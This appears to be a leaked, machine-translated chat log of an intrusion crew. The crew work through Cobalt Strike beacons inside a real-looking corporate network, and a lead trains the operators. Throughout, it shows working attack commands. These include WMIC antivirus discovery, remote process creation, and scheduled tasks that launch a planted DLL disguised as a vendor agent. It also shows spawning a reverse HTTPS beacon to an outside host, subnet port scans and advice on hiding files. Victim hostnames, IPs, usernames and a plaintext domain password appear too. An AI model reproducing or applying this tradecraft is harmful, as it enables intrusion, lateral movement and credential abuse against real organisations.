TLCAutoTFR.loomisco.com
TLCSKLM1.loomisco.com
TLCEPICCS01.loomisco.com
There's a description of Applied Epic in this group:
Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace.
```
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.0.100
```
```
Host Name:                 EPICAPM
OS Name:                   Microsoft Windows Server 2012 Standard
OS Version:                6.2.9200 N/A Build 9200
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:
Registered Organization:
Product ID:                00184-20216-77791-AA002
Original Install Date:     12/30/2015, 3:54:54 AM
System Boot Time:          6/13/2020, 6:34:03 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2594 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 4/5/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     8,032 MB
Available Physical Memory: 6,263 MB
Virtual Memory: Max Size:  9,952 MB
Virtual Memory: Available: 8,052 MB
Virtual Memory: In Use:    1,900 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    loomisco.com
Logon Server:              N/A
Hotfix(s):                 169 Hotfix(s) Installed.
```
VMs
Image Name PID Session Name Session# Mem Usage User Name CPU Time ========================= ======== ================ =========== ============ ================================================== ============ System Idle Process 0 Services 0 20 K NT AUTHORITY\SYSTEM 10724:49:14 System 4 Services 0 304 K N/A 1:45:28 smss.exe 268 Services 0 1,072 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 356 Services 0 4,744 K NT AUTHORITY\SYSTEM 0:00:16 csrss.exe 420 Console 1 3,628 K NT AUTHORITY\SYSTEM 0:00:00 wininit.exe 428 Services 0 3,940 K NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 456 Console 1 5,476 K NT AUTHORITY\SYSTEM 0:00:00 services.exe 520 Services 0 12,584 K NT AUTHORITY\SYSTEM 0:05:33 lsass.exe 528 Services 0 15,956 K NT AUTHORITY\SYSTEM 0:09:39 svchost.exe 640 Services 0 7,644 K NT AUTHORITY\SYSTEM 0:00:15 SEDService.exe 672 Services 0 11,020 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 744 Services 0 7,244 K NT AUTHORITY\NETWORK SERVICE 0:02:27 svchost.exe 796 Services 0 16,680 K NT AUTHORITY\LOCAL SERVICE 1:11:22 LogonUI.exe 832 Console 1 27,584 K NT AUTHORITY\SYSTEM 0:00:00 dwm.exe 840 Console 1 33,316 K Window Manager\DWM-1 0:00:00 svchost.exe 864 Services 0 73,508 K NT AUTHORITY\SYSTEM 2:19:36 svchost.exe 908 Services 0 12,780 K NT AUTHORITY\LOCAL SERVICE 0:00:01 svchost.exe 1152 Services 0 23,248 K NT AUTHORITY/NETWORK SERVICE 0:01:56 svchost.exe 1292 Services 0 11,396 K NT AUTHORITY\LOCAL SERVICE 0:00:00 spoolsv.exe 1464 Services 0 9,336 K NT AUTHORITY\SYSTEM 0:00:00 armsvc.exe 1496 Services 0 4,312 K NT AUTHORITY\SYSTEM 0:00:00 ASI.SMART.Client.FileServ 1536 Services 0 17,920 K NT AUTHORITY\SYSTEM 0:00:00 ASI.SMART.Client.Listener 1616 Services 0 23,084 K NT AUTHORITY\SYSTEM 0:00:00 ASI.SMART.Client.ProxySer 1672 Services 0 14,720 K NT AUTHORITY\SYSTEM 0:00:00 ASI.SMART.Deployment.Inst 1724 Services 0 23,856 K NT AUTHORITY\SYSTEM 0:00:00 ASI.SMART.Internals.Share 1820 Services 0 24,416 K NT AUTHORITY\SYSTEM 0:00:00 atashost.exe 1864 Services 0 3,856 K NT 
AUTHORITY\SYSTEM 0:00:00 cissesrv.exe 1884 Services 0 3,756 K NT AUTHORITY\SYSTEM 0:00:00 HpAmsStor.exe 1908 Services 0 3,600 K NT AUTHORITY\SYSTEM 0:00:00 ProLiantMonitor.exe 1956 Services 0 6,440 K NT AUTHORITY\SYSTEM 0:00:00 SSPService.exe 2124 Services 0 18,096 K NT AUTHORITY\SYSTEM 0:00:01 smhstart.exe 2800 Services 0 7,624 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 2848 Services 0 14,980 K NT AUTHORITY\SYSTEM 0:32:12 tvnserver.exe 2880 Services 0 5,172 K NT AUTHORITY\SYSTEM 0:00:01 VGAuthService.exe 2948 Services 0 10,728 K NT AUTHORITY\SYSTEM 0:00:00 cmd.exe 2956 Services 0 1,928 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 2968 Services 0 2,936 K NT AUTHORITY\SYSTEM 0:00:00 hpsmhd.exe 2980 Services 0 16,832 K NT AUTHORITY\SYSTEM 0:00:00 vmtoolsd.exe 3004 Services 0 88,820 K NT AUTHORITY\SYSTEM 1:30:18 ManagementAgentHost.exe 3028 Services 0 10,108 K NT AUTHORITY\SYSTEM 0:00:01 hpqams.exe 3060 Services 0 17,176 K NT AUTHORITY\SYSTEM 1:08:07 rotatelogs.exe 3216 Services 0 3,420 K NT AUTHORITY\SYSTEM 0:00:00 rotatelogs.exe 3224 Services 0 3,424 K NT AUTHORITY\SYSTEM 0:00:00 WmiPrvSE.exe 3304 Services 0 25,580 K NT AUTHORITY\SYSTEM 0:01:52 WmiPrvSE.exe 3312 Services 0 44,804 K NT AUTHORITY\NETWORK SERVICE 1:38:54 hpsmhd.exe 3424 Services 0 18,220 K NT AUTHORITY\SYSTEM 0:00:00 rotatelogs.exe 3532 Services 0 3,456 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 3540 Services 0 3,056 K NT AUTHORITY\SYSTEM 0:00:00 rotatelogs.exe 3564 Services 0 3,436 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 3572 Services 0 3,052 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 4024 Services 0 8,664 K NT AUTHORITY\NETWORK SERVICE 0:00:01 svchost.exe 4060 Services 0 4,648 K NT AUTHORITY\NETWORK SERVICE 0:00:00 dllhost.exe 296 Services 0 10,888 K NT AUTHORITY\SYSTEM 0:00:00 msdtc.exe 4284 Services 0 7,660 K NT AUTHORITY\NETWORK SERVICE 0:00:00 RouterNT.exe 4568 Services 0 8,744 K NT AUTHORITY\SYSTEM 0:00:13 ManagementAgentNT.exe 2996 Services 0 7,360 K NT AUTHORITY\SYSTEM 0:03:38 swc_service.exe 4796 
So what processes are they?

```
>description: EPIC Dashboard Server (PC) OU=EPIC SERVICE Dashboard Server: EpicAPM.loomisco.com Central Server: TLCEPICCS01.loomisco.com MoveIt Server: TLCAutoTF2.loomisco.com TLCANALYTICS1.loomisco.com TLCAutoTFR.loomisco.com TLCSKLM1.loomisco.com
```

write in isis. inetinfo.exe is a component of Microsoft Internet Information Services (IIS), the popular web server package widely deployed on the Internet.

will be our local meme) Forgot, now fix it. first you only need to make a token to run the tripod, only remove the hell info preparation which you did on the servers kai? waiting for the report then. and in such cases under the group name in () write a description, what kind of software, do group `HCL Sametime` and there this server. HCL Sametime is a client-server application and middleware platform that provides real-time, unified communications and collaboration for enterprises. Those capabilities include presence information, enterprise instant messaging, web conferencing, community collaboration, and telephony capabilities and integration. https://www.processchecker.com/developers_info/25/IBM%20Corp what's that gadget, can't Google it.
khm khm (@user9) I thought someone was going to say take the hell off of the system, I'm just kidding, is everybody that incomprehensible? then why do we all go home if there are no clues, just make a VMs group

```
System Manufacturer: VMware, Inc.
System Model: VMware7,1
```

and take off systeminfo.

a list of processes in the studio virtualka, what else? if TightVNC process hangs in the RDS can you throw the server? I would generally recommend that you start learning ps or batsy razvedeniya with batnik, stupid in syntax) still useful this script of course ping that did not have to then end of the day did all well modtsida no I thought that you did supernatural) aaa so I just got into the process))) aah, that's not it. @user9 throw pliz example commands, write yourself in the notes on spawning sessions from another context through jump with creds yeah? beacon from Shutdown@192.168.0.249 (SCANSTORAGE). Then clean up, delete files, tsk, processes and in slip, da, and that's it for today. the list of servers to finish everything, great. after all documentation please share with colleagues and add if something is missing. who documented the current information for today? IMAGING2-NEW.loomisco.com Block GPO: Metafile-vm1.loomisco.com these? + a fully sorted list of servers and the result is shuffleable. I think you understand that the frontend is just the interface for interoperability

```
Sophos.FrontEnd.Service.e 4816 Services 0 99,720 K LOOMIS\lynx 0:00:06
```

list

```
1 [ManagementAgentNT.exe] TCP 10.10.10.56:54963 192.168.0.109:8194
```

As you understood, remove the netstat and see where it sends the data. ManagementAgentNT.exe file information: The process known as Sophos Agent belongs to Sophos Messaging System or Sophos Remote Management System software. To remove doubts on a bare-metal server, non-standard processes will be AVs.
```
ManagementAgentNT.exe 1992 Services 0 6,616 K NT AUTHORITY\SYSTEM 0:02:41
swc_service.exe 1340 Services 0 5,212 K NT AUTHORITY\SYSTEM 0:00:00
SavService.exe 9812 Services 0 360,792 K NT AUTHORITY\LOCAL SERVICE 1:03:33
SAVAdminService.exe 7228 Services 0 5,704 K NT AUTHORITY\SYSTEM 0:00:00
swi_service.exe 4432 Services 0 23,152 K NT AUTHORITY\SYSTEM 0:00:01
```

So it's simple - we saw in the processes AV (Sophos), in networks it is centralized in its administrate, search AV in the network)

While the scan goes, 160 of 543 works sharefinder, enough Sophos everywhere, pft,fkcz, ping them there, live 1/10

```
beacon> shell WMIC /Node:192.168.4.28 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.4.28 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 139 bytes
[+] received output:
displayName=Sophos Anti-Virus
```

Chrome is open under. Give a list of processes from here: `192.168.0.109` what exactly?

```
beacon> shell WMIC /Node:192.168.1.235 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.1.235 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 140 bytes
[+] received output:
displayName=Sophos Anti-Virus
```

@user8 do not delete files means? The taskeng.exe process is part of the Task Scheduler Engine of Microsoft. Isn't the box that pops up at startup of the Delloks called taskeng.exe?
)))) great, make a sharefinder and the process from YES will hang there) then the following method: make a batch with timeout 9999999 and run us stasx. apparently when you run it, dlk is not working and cmd is running under YES by inertia. did the process hang? why is it here? PS look sheet

```
shell wmic /node:10.10.10.56 process call create "cmd /c netstat.exe -abno > C:\Windows\Temp\output.txt"
```

Take.

```
beacon> runas /user:loomisco.com\Shutdown p3bk@c1 "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint"
[*] Tasked beacon to execute: "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" as /user:loomisco.com\Shutdown
[+] host called home, sent: 125 bytes
[-] could not run "cmd /c rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" as /user:loomisco.com\Shutdown: 5
```

what did i do wrong ?

```
beacon> shell WMIC /Node:192.168.6.34 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.6.34 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 139 bytes
[+] received output:
ERROR:
Description = The RPC server is unavailable.
```
and all then. @user8 in notes syntax. second. which beacon? there may be another AV on top) yes it worked out and file not give here. netstat more? which is obvious, and 2 more pc for accuracy

```
beacon> shell WMIC /Node:192.168.0.107 /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:192.168.0.107 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 140 bytes
[+] received output:
displayName=Sophos Anti-Virus
```

Waiting)) everything will be here. 1 Da, sure, I asked for user PCs for a reason. The above link does not work on server OSes, because such namespace does not exist as such. `C:\Windows\temp\vmware-temp\AgentNT.dll` - again, did not pay attention, that's the same metafile. I am confused. Node:10.10.10.56 what os? now i will try. by the way runas did not work? with the creds can try through wmic. if you just start the dll then the session appears and without stask?
as i have not tried, through the stask can not start the dll

```
beacon> shell WMIC /Node:10.10.10.56 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[*] Tasked beacon to run: WMIC /Node:10.10.10.56 /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
[+] host called home, sent: 138 bytes
[+] received output:
ERROR:
Description = Invalid namespace
```

just change the node. and in which beacon? Yes, some ancient manuscript

```
WMIC /Node:localhost /Namespace:\\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
```

I think something in Latin. give you a nickname if you understand it. here take another list of AVs on user PCs, 2-3 pcs, kznm

```
beacon> shell wmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[+] host called home, sent: 136 bytes
[+] received output:
Invalid Global Switch.

beacon> shell wmic /node:10.10.10.56 process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:10.10.10.56 process call create "netstat.exe -abno > C:\Windows\Temp\output.txt"
[+] host called home, sent: 122 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
	ProcessId = 8144;
	ReturnValue = 0;
};
```

and C:\windows\temp always, C:\temp is not always. C:\temp, C:\, C:\users are quite visible places. it is clear, I for example do not recommend to put files in such places, since the system's rights anyway - C:\windows\temp

```
wmic /node:Metafile-vm1.loomisco.com process call create "netstat.exe -abno > C:\output.txt"
```

@user8 then let's see the list of installed software Metafile-vm1.loomisco.com. Maybe it's this. @user7 add /RP just in case. /RP is not a file washer at all

```
beacon> shell rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint
[*] Tasked beacon to run: rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint
```

Does it work that way?

on Metafile-vm1.loomisco.com mostly Sophos (av) processes. which beacon? and if you run it manually will it work (what is installed may not be active, as a relic of some time. with or without cmd, have tried. maybe better to look at the installed software and not the processes? try to remove it, so it was removed and the exe is still there?) try to add cmd /c rundll32 ... try to add at the beginning of cmd /c. 4 people can not find a possible error in the command? 4. who works next to @user7 ? yes, token. @user9 under what conditions would this syntax be? shell tasklist /s /v. da, tasklist through shell go?
and also, get in the habit of immediately deleting the stask behind you. it will show and user from which to spin with the flag /v. better check through tasklist? i can not see that the 4th point is done) :^) please forward the message where i wrote how to determine) either the error in the /tr itself, or yes, i have prohibited to run the dll

```
>dNSHostName: Metafile-vm1.loomisco.com
dn:CN=METAFILE-VM1,OU=Block GPOs,OU=Unblocked,OU=Domain Servers,DC=loomisco,DC=com
>servicePrincipalName: TERMSRV/METAFILE-VM1
>servicePrincipalName: TERMSRV/Metafile-vm1.loomisco.com
>servicePrincipalName: HOST/METAFILE-VM1
>servicePrincipalName: HOST/Metafile-vm1.loomisco.com
```

no description, you can't tell from the name, spn 4 things, well where is it not running ?

```
beacon> shell schtasks /create /en loomisco.com\Omiller /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc ONCE /sd 10/04/2021 /ST 01:00 /f
[*] Tasked beacon to run: schtasks /create /en loomisco.com\Omiller /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc ONCE /sd 10/04/2021 /ST 01:00 /f
[+] host called home, sent: 199 bytes
[+] received output:
SUCCESS: The scheduled task "ManagementAgentNTT" has successfully been created.

beacon> shell schtasks /run /tn ManagementAgentNTT
[*] Tasked beacon to run: schtasks /run /tn ManagementAgentNTT
[+] host called home, sent: 67 bytes
[+] received output:
SUCCESS: Attempted to run the scheduled task "ManagementAgentNTT".
```

I wrote above) and how do I understand this pile of spn without a description, type OU=Epic Server, but there are some local tricks they have. I understand the essence of looking at the names and do not understand what is there) the essence of sorting is to make it clear what the server has, or what it is for?
Data Transfer: IMAGING2-NEW.loomisco.com What do we have here? Block GPO: Metafile-vm1.loomisco.com okay, 1 minute. sharfein can't run? ok, what do we have in the end? then we still need to finish sorting. O there I just do not know where to put, they have in hell so says other. help @user7 then, because he again randomly pokes commands. a, I noticed) on the command try) okay, @user9 a little joke, more scolding do not want. delete the old task, name the same name) `WARNING: The task name "ManagementAgentNTT" already exists. Do you want to replace it (Y/N)?` how do i get around it ? how do i do that ? i wanted to write shell, but i got make_token, misclick, user 2-2

```
beacon> make_token
[-] make_token error: not enough arguments
[+] host called home, sent: 12 bytes
```

just schtasks /ru "domain\user" /tn .... a since the context of the system you do not need to know his password and the user from which starts, run as user parameter `RU`. @user9 made me laugh, now let's take this move and impose on stask. okay, I like your way of thinking))))))) :weary: just in any unclear situation shoot ad. @user9 to tears straight)))) By local startup? well no) ah well shuffle_wasn't this task at all unexpectedly written)) but it was funny. why shoot @user9? is already interesting to inject into the process. da, token to run staks as an option, and in the context of user7 conditions? you can not token, full-fledged process with creds. da, token Run remote. 1) anyone know how to solve the problem user7? I'll ask one question and please honestly: why? you saw it before, conditions are identical, how do you breathe under water?
yes I think it is already clear since it does not give) so without `/s` it will not create. set parameters to create local stask, what? 1) 2) @user7 already said that he tried 3 users and the error is the same. are you trying to create a task on a remote pc? but if yes it does not work please give me a hint how ? if it is possible to spam with the correct creds need. colleagues, everyone has such a verdict? did not fully understand the question, got it, then it turns out that not spam YES on this machine? so why are you writing them? credentials are not allowed on the local pc, so? - the translation of the error, at least he is watched by his team) i already wrote @user3 in lsd, now rushed to tasks - they form lists of servers, yes. user7 what the hell are you doing, start studying the output of commands. You have 3 more pcs. Is ANY user on the local machine + you write the LOCAL user? someone fucking reads the errors? I'll read it again. @user8 wait not much. IM Server, Central Server, Database server for multiple DBs, with them it's clear RDS/IIS/SQL. under 3 users writes that it is not allowed on this machine. I see descriptions a bunch and almost all identical, look. understand what it needs. silence? strange group, do you put them in a separate group?
```
beacon> shell schtasks /create /s SCANSTORAGE /u loomisco.com\Shutdown /p p3bk@c1 /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc
[*] Tasked beacon to run: schtasks /create /s SCANSTORAGE /u loomisco.com\Shutdown /p p3bk@c1 /tn ManagementAgentNTT /tr "rundll32 C:\Windows\temp\vmware-temp\AgentNT.dll entryPoint" /sc minute
[+] host called home, sent: 198 bytes
[+] received output:
ERROR: User credentials are not allowed on the local machine.
```

what to do ? try another user ? outside the domain: `192.168.0.224:445 (platform: 500 version: 5.0 name: OCR1 domain: WORKGROUP)`. 1 above file portscan.txt. How do you scan the subnets? I think one by description? OK there is user RDS and RDS list by name, by group, by description, by process

```
>dNSHostName: TLCRDSLIC1.loomisco.com
>servicePrincipalName: WSMAN/TLCRDSLIC1
>servicePrincipalName: WSMAN/TLCRDSLIC1.loomisco.com
>servicePrincipalName: TERMSRV/TLCRDSLIC1
>servicePrincipalName: TERMSRV/TLCRDSLIC1.loomisco.com
>servicePrincipalName: RestrictedKrbHost/TLCRDSLIC1
>servicePrincipalName: HOST/TLCRDSLIC1
>servicePrincipalName: RestrictedKrbHost/TLCRDSLIC1.loomisco.com
>servicePrincipalName: HOST/TLCRDSLIC1.loomisco.com
```

There are lots of SPNs out there. What parameters should I look at to sort them? Anything that is grouped: exchange, web, sql, dc, backup, ftp, etc. Try other options to get it in a different context and see what you can find:

```
DCs
TLCDC2
TLCDC1
-----
SQL
LOOMISBENSQL01
```

which groups?
```
beacon> spawnas loomisco.com\Shutdown p3bk@c1 3333
[*] Tasked beacon to spawn windows/beacon_bind_pipe (\.\pipe\msagent_6736) as loomisco.com\Shutdown
[+] host called home, sent: 255580 bytes
[-] could not run C:\Windows\system32\mstsc.exe as loomisco.com\Shutdown: 5
[-] Could not connect to pipe: 2
```

Other servers are sorted into groups while some are busy with sharefinder. try the smb listener.

```
beacon> spawnas loomisco.com\EDIADMIN APPSYS https
[*] Tasked beacon to spawn windows/beacon_https/reverse_https (oldplex.com:443) as loomisco.com\EDIADMIN
[+] host called home, sent: 261169 bytes
[-] could not run C:\Windows\system32\mstsc.exe as loomisco.com\EDIADMIN: 5
```

How do you spawn? No process YES, under it does not spawn. works, does not work etc. I am waiting for some kind of a fitbaby. guys, let's not be silent) not through make_token, but the full process from the domain admin process, as above. throw in a separate message host - OS and so on, then full log files from the domain admin context. run sharefinder until scanned, in this form.

```
beacon> portscan 192.168.3.0/24 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 192.168.3.0/24
[+] host called home, sent: 93245 bytes
```
[read 8 bytes] [+] received output: 192.168.3.3:445 (platform: 500 version: 10.0 name: SUPPACCSTATS1 domain: LOOMIS) 192.168.3.18:445 (platform: 500 version: 6.1 name: SCALA1 domain: LOOMIS) 192.168.3.31:445 (platform: 500 version: 10.0 name: ESSEXO365 domain: LOOMIS) 192.168.3.32:445 (platform: 500 version: 10.0 name: SVALLON domain: LOOMIS) 192.168.3.41:445 (platform: 500 version: 6.0 name: PRINTSRV08 domain: LOOMIS) 192.168.3.55:445 (platform: 500 version: 10.0 name: TLCEPICCSR24 domain: LOOMIS) 192.168.3.94:445 (platform: 500 version: 10.0 name: MMALONEY domain: LOOMIS) 192.168.3.98:445 (platform: 500 version: 10.0 name: CPETERS domain: LOOMIS) 192.168.3.99:445 (platform: 500 version: 10.0 name: AFOLK2 domain: LOOMIS) 192.168.3.244:445 (platform: 500 version: 10.0 name: FSITRACK domain: LOOMIS) 192.168.3.245:445 (platform: 500 version: 10.0 name: TLCEPICIIS1 domain: LOOMIS) 192.168.3.247:445 (platform: 500 version: 10.0 name: COMMISSIONSTAT domain: LOOMIS) 192.168.3.248:445 (platform: 500 version: 10.0 name: PRINTSRV16 domain: LOOMIS) [+] received output: 192.168.3.252:445 (platform: 500 version: 10.0 name: TLCEPICFAX domain: LOOMIS) Scanner module is complete ``While the scanning is going on, if everything is clear, I thought there would be a question why) no questions about it no? yes ``portscan 192.168.0.0/24 445 icmp 1024` the result here all four at once I start or wait until each works? and run in turn at the end add `icmp 1024 `portscan 192.168.0.0/24 445[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jhx6mHCdctixMbnBK) before scanning the ports the command here192.186.1.0/24 not the experience of using the utility ping?) stop[ ](https://mediaeveryone.com/group/archive-loomisco-com?msg=jhx6mHCdctixMbnBK) port scan to smb ports let's go ahead and agree that the work on the task min 10command ping, do sysadmins need to discuss this? 
192.168.8.0/24
10.10.10.0/24
The sticking point is: we do something, we can't do it, we ask you, and all you give us is leading questions and vague answers like
@user8 please make a list of subnets
192.168.8
20 * 70 min
100 / 5 = 20
10.10.10.0
Ping 5% of the workload for today.
```
192.168.0.0/24
192.168.3.0/24
10.10.10.0/24
192.168.8.0/24
```
Just let's do the math:
Waiting for the subnets.
Whoever doesn't know, so as not to go for the Darwin prize: go by /24 mask.
70 minutes per ping, this is a new record)
Fuck, why do I have to repeat it twice?
Less than half of them removed.
```
mstsc.exe 4840 Services 0 13,640 K Unknown NT AUTHORITY\SYSTEM 0:03:30 N/A
mstsc.exe 4304 Services 0 61,060 K Unknown NT AUTHORITY\SYSTEM 0:51:19 N/A
mstsc.exe 5868 Console 3 3,052 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 5564 Console 3 3,016 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 3056 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 3188 Services 0 12,216 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 4996 Services 0 12,944 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 2420 Services 0 20,184 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 3388 Services 0 14,380 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 1176 Services 0 12,052 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 1152 Services 0 11,964 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
[+] received output:
mstsc.exe 4840 Services 0 13,608 K Unknown NT AUTHORITY\SYSTEM 0:03:30 N/A
mstsc.exe 4304 Services 0 61,060 K Unknown NT AUTHORITY\SYSTEM 0:51:19 N/A
mstsc.exe 5868 Console 3 3,052 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 5564 Console 3 3,016 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 3056 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 3188 Services 0 12,384 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 4996 Services 0 13,200 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
```
27-52
Will the second half of the hosts arrive when the pings are done?
It's been an hour.
I see.
It's been an hour.
Is this not a problem either?
@user1 @user3 where is local control in the groups? It's total anarchy.
Leave yourself two sessions and sit in single sessions.
Call his PC to reboot, and don't even think about jumping into winlogon.
If I were an advanced user, I would open tasklist and immediately see that something is wrong.
```
[+] received output:
mstsc.exe 4840 Services 0 13,640 K Unknown NT AUTHORITY\SYSTEM 0:03:30 N/A
mstsc.exe 4304 Services 0 61,060 K Unknown NT AUTHORITY\SYSTEM 0:51:19 N/A
mstsc.exe 5868 Console 3 3,052 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 5564 Console 3 3,016 K Unknown SCANSTORAGE\Administrator 0:00:00 N/A
mstsc.exe 3056 Services 0 12,480 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 3188 Services 0 12,216 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 4996 Services 0 12,944 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 2420 Services 0 20,184 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 3388 Services 0 14,380 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
mstsc.exe 1176 Services 0 12,052 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
mstsc.exe 1152 Services 0 11,964 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
```
Work quietly.
I'll open the process list and delete all the mstsc that I find.
And also need the host.
With this approach, is the IP address written? Or just "host - active"?
I know it's late.... but
```
$job = foreach($line in (Get-Content hostlist.txt)){
    if(Test-Connection -ComputerName $line -Count 1 -Quiet){
        Start-Sleep -s 3
        Write-Warning $line
        Write-Output "$line - Active"
    }
}
$job | Out-File alive.txt -Append
```
I hope you're not scanning hosts 2-3 times; it's not funny, you're scanning 4 times too.
```
Pinging FSITrack.loomisco.com [192.168.3.244] with 32 bytes of data:
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127
Reply from 192.168.3.244: bytes=32 time<1ms TTL=127
Ping statistics for 192.168.3.244:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
beacon> shell ping PDFStorage.loomisco.com
[*] Tasked beacon to run: ping PDFStorage.loomisco.com
beacon> sleep 3
[*] Tasked beacon to sleep for 3s
[+] host called home, sent: 75 bytes
[+] received output:
Pinging PDFStorage.loomisco.com [192.168.0.223] with 32 bytes of data:
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128
Reply from 192.168.0.223: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.0.223:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
beacon> shell ping TLCSophos.loomisco.com
[*] Tasked beacon to run: ping TLCSophos.loomisco.com
beacon> sleep 3
[*] Tasked beacon to sleep for 3s
[+] host called home, sent: 74 bytes
[+] received output:
Pinging TLCSophos.loomisco.com [192.168.0.109] with 32 bytes of data:
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
Reply from 192.168.0.109: bytes=32 time<1ms TTL=128
```
No, the question was to the point, about the launch priorities.
Privately.
Look out for each other; after all, there are 6 people around you.
Guys, well, I honestly asked you to keep it down.
Immediately removed `-n`.
user 2-2
```
beacon> shell ping TLCBENTS02.loomisco.com
[*] Tasked beacon to run: ping TLCBENTS02.loomisco.com
[+] host called home, sent: 59 bytes
[+] received output:
Pinging TLCBENTS02.loomisco.com [192.168.8.166] with 32 bytes of data:
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127
Reply from 192.168.8.166: bytes=32 time<1ms TTL=127
Ping statistics for 192.168.8.166:
